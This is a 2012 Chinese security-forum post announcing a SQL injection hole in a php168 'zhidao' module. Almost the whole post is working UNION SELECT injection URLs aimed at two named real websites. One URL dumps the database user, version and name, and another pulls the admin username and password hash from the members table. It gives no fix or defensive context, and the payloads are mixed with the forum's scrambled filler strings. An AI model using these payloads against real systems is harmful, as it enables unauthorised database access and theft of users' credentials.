找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2973|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
+ c* W1 ]1 B6 E  R                                                         
* ?* d9 v, N- z- N' ~! d7 T                                       
! U0 p" ]% S8 v' ^$ n7 p
1 r9 J# {2 \1 F; k) T# l* ?+ w
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--( i' v9 I5 Q" a5 u+ w, f
                                                     
) X- }0 L3 x+ U: O) b) Y                                                                   " z% s+ a  I. [6 K" I
                                                        $ ]7 {2 K6 a) h* L0 F$ f
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--' r9 V, e1 i  G5 u- ^# t
0 ?, {2 T$ S1 \  _
0 x' g8 S% ~: ?/ o( Z! P

* X' o1 U- |1 d: r& d% i4 N                                                            . e  v8 R% R3 E; [- f; u- L" a( n6 f% h

* n+ v) _$ m( p  e' hhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
! \& d- U0 r# T6 @" H
2 n% C( t( B2 l. I4 F% [
: f& F7 R$ D+ q' f) ~# W, [& u2 |3 r
) k4 c* U9 s3 W: u6 J6 M2 G$ U                                                                    0 j3 o& T$ f) V5 _  f

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表